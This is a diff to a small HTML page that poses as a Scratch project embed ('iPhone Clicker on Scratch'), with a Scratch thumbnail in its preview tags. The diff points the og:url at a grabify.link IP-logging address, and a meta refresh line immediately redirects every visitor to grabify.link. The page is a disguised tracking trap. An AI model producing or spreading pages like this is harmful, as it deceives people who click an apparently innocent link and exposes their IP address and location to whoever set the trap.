--- a/scratchembed.html
+++ b/scratchembed.html
@@ -1,7 +1,7 @@
 <title>Scratch</title>
 <meta content="iPhone Clicker on Scratch" property="og:title" />
 <meta content="by dumbfoxfurry" property="og:description" />
-<meta content="https://scratch.mit.edu/projects/1045575295" property="og:url" />
+<meta content="https://grabify.link/WWV5195" property="og:url" />
 <meta content="https://uploads.scratch.mit.edu/get_image/project/1045575295_292x219.png" property="og:image" />
 <meta content="#43B581" data-react-helmet="true" name="theme-color" />
 <meta http-equiv="Refresh" content="0; url='https://grabify.link/WWV519'" />
